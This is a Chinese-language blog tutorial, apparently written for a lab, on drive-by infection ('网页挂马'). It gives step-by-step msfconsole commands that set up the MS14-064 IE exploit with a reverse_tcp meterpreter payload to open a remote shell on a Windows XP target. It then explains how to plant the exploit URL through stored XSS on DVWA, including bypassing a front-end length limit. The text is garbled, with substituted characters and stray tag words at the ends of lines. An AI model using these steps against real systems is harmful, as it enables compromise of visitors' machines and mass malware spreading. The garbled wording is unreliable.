Hello,各位小伙伴们你们好~前端
端午假期第一天,你们玩嗨了嘛?
小编是玩嗨了,毕竟已经拖更五天了…
好啦,直接进入正题吧,前面也写了两期XSS相关的内容,今天就来点高大上的(并非!),咱们来经过XSS实现网页挂马吧~linux
1、准备工做web
实验拓扑:
实验分为两部分:shell
一、经过Kali linux,利用MS14_064漏洞,制做一个木马服务器。存在该漏洞的用户一旦经过浏览器访问木马服务器,就会缓冲区溢出,攻击者能够直接获取用户的系统Shell。数据库
二、将木马服务器的URL,插入到一个存在XSS漏洞的正常web服务器中,一旦有人访问该服务器的挂马页面,并且该用户存在MS14_064漏洞,就会中招。windows
Here we go ~浏览器
Part 1:制做木马服务器安全
一、基本介绍服务器
(1)MS14_064漏洞微信
MS表明MicroSoft,14_064指的是2014年的第64个漏洞。
该漏洞影响范围为Win95+IE3 – Win10+IE11全版本,形成被攻击主机缓冲区溢出,触发该漏洞须要客户端安装有power shell软件。
(2)MetaSploit Framework(MFS)
本次进行缓冲区溢出的工具主要是MetaSploit Framework,其中集成了各个平台上常见的溢出漏洞和利用代码,而且不断更新。
Kali linux 自带该工具,可直接使用。
MFS包含三个基本模块:
通常都是先使用渗透攻击模块exploit对目标系统进行渗透(如溢出),渗透成功后执行攻击载荷模块payload。
二、MFS基本操做
启动msf:root@kali:~# msfconsole
初始化数据库:msf5 > msfdb init //数据库初始化后,msf查询速度会大幅提高
msf5 > db_status #查看MSF数据库链接状态 。
三、使用MS14_064漏洞
首先咱们搜索一下MS14_064漏洞,msf5 > search MS14_064
调用这个exploit:
msf 5> use exploit/windows/browser/ms14_064_ole_code_execution
查看一下这个exploit须要配置的选项:
msf5 exploit(ms14_064_ole_code_execution) > show options
设置容许调用powershell:
msf5 exploit(ms14_064_ole_code_execution) > set AllowPowershellPrompt true
//该漏洞须要利用目标主机powershell功能进行攻击
设置木马服务器IP(Kali IP):
msf exploit(ms14_064_ole_code_execution) > set srvhost 192.168.211.134
设置调用的payload:
msf5 exploit(ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcp
这里使用反弹链接payload,让靶机主动链接咱们。使用reverse类型的好处在于,能够不用担忧链接被靶机的防火墙阻断。
设置监听IP(kali IP):
msf5 exploit(ms14_064_ole_code_execution) > set lhost 192.168.211.134
再设置一下监听接口,靶机中招后会主动链接咱们这个端口:
msf5 exploit(ms14_064_ole_code_execution) > set lport 4444
最后,输入exploit(或者run)开启攻击服务:
kali 的web服务已开启,并生成了一个URL:http://192.168.211.134:8080/Dyvk2r6MwyGc,一旦存在MS14_064漏洞的主机访问这个URL,就会被控制。
四、尝试控制靶机
咱们使用一台Windows xp主机(192.168.211.171),经过浏览器访问http://192.168.211.134:8080/Dyvk2r6MwyGc。
Kali 马上提示已发送exploit至目标主机,而且打开了一个链接:
经过session -l 咱们能够查看当前有会话的主机,id号为1:
使用 session -i +id号,咱们就能够连上靶机了。
输入shell,成功取得靶机的shell:
下一步,咱们就想办法,经过XSS将这个URL挂到一个web服务器上去,就不用咱们亲自去传播这个木马了~
Part 2:网页挂马
接下来咱们就开始网页挂马吧~
首先咱们的目标是一个存在存储型XSS漏洞的网页,看过我前面文章的小伙伴们应该知道,DVWA平台上就有专门给咱们练习存储型XSS漏洞的页面,咱们就经过这个网页来实践挂马。
将网页安全等级调整为low,插入以下语句:
可是会发现网页有输入长度限制:
因为是前端限制,利用火狐浏览器,查看源代码修改长度限制便可:
输入后顺利插入:
此时,咱们查看网页源代码,就能看到js脚本了:
最后,使用靶机浏览器访问这个挂马网页:
查看Kali,成功链接:
payload 除了使用script标签之外,还有其余多种标签,如:
好啦,这就是今天的所有内容了,小伙伴们都学会了吗?
若有问题,欢迎到个人微信公众号留言哦~
peace!